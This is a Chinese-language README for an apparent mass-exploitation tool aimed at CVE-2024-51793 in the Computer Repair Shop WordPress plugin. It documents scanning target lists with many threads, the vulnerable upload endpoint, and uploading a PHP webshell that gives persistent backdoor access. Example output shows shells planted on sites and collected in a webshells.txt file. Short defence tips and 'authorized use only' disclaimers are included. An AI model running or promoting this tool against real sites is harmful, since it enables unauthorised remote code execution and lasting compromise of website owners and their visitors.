
针对 CVE-2024-51793 的自动化利用工具,该漏洞是 WordPress 插件 Computer Repair Shop 中的未经身份验证的任意文件上传漏洞。可扫描目标、上传 PHP webshell 并实现远程代码执行。
CVE-2024-51793 利用工具文档 📋 概述 CVE-2024-51793 是 Computer Repair Shop WordPress 插件(3.8116 版本之前)中存在的一个未经验证的任意文件上传漏洞。该漏洞允许攻击者无需认证即可上传任意文件(包括 PHP webshell),从而在存在漏洞的 WordPress 站点上实现远程代码执行。
🚨 漏洞详情 CVE ID:CVE-2024-51793
漏洞类型:未经验证的任意文件上传
受影响插件:Computer Repair Shop WordPress 插件
受影响版本:< 3.8116
风险等级:严重(CVSS 评分:9.8)
🔧 技术细节
该漏洞存在于插件中的 wc_upload_file_ajax 动作处理程序中,该程序未能正确验证文件类型和用户身份验证,从而允许未经验证的攻击者直接将恶意文件上传到服务器。
📦 安装与要求 先决条件 Python 3.6+
所需包:requests
安装 bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt 🛠️ 使用指南 基本用法 bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 高级用法 bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose 命令行参数 参数 短参数 描述 默认值 --list -l 包含目标 URL 的文件路径(必填) - --threads -t 并发线程数 50 --output -o 结果输出目录 results 输入文件格式 创建一个文本文件(targets.txt),每行一个 URL:
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 工作原理
text /wp-content/plugins/computer-repair-shop/readme.txt 2. 版本检测 它验证插件是否包含 "CRM WordPress Plugin" 并且版本低于 3.8116。
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. Webshell 负载 上传的 webshell 提供以下功能:
文件上传能力
基本文件管理
持久化后门访问
📊 输出文件 该工具生成两个主要输出文件:
vulnerable_targets.txt - 已确认存在漏洞的 URL 列表
webshells.txt - 成功上传的 webshell URL 列表
🎯 示例执行 bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Exploit Tool ║
║ Unauthenticated RCE in Computer Repair Shop WP Plugin ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Loaded 150 unique targets [ INFO ] Starting scan with 30 threads
[ SCANNING ] Checking: http://example.com/ [ VULNERABLE ] Target identified: http://example.com/ [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANNING ] Checking: http://testsite.com/ [ NOT VULNERABLE ] Target: http://testsite.com/
[ COMPLETED ] Scan finished successfully 🛡️ 防御措施 对于网站所有者 立即执行的操作:
将 Computer Repair Shop 插件更新至 3.8116 或更高版本
删除已上传的任何恶意文件
扫描现有入侵痕迹
预防措施:
部署 Web 应用防火墙(WAF)
定期进行安全审计
文件完整性监控
对于安全研究人员 仅在授权环境中使用
遵循负责任的披露实践
在测试前获取适当权限
⚠️ 法律与伦理考量 此工具仅用于教育和授权的安全测试
未经授权对不属于自己的系统进行使用是违法的
进行渗透测试前务必获得适当授权
遵循负责任的披露实践处理发现的漏洞
🔄 维护 更新 定期检查:
脚本更新和改进
漏洞状态变化
新的检测方法
故障排除 常见问题及解决方案:
连接超时:增加会话配置中的超时值
误报:确认目标 URL 可访问
速率限制:减少线程数并添加延迟
📞 支持 如有问题或改进建议:
在项目仓库中创建 issue
联系方式:TG: @KtN_1990
📚 参考 CVE-2024-51793 官方条目
WordPress 插件目录
[安全公告参考]
免责声明:此工具仅应用于合法的安全研究和授权的渗透测试。作者不对该工具的任何滥用或造成的损害负责。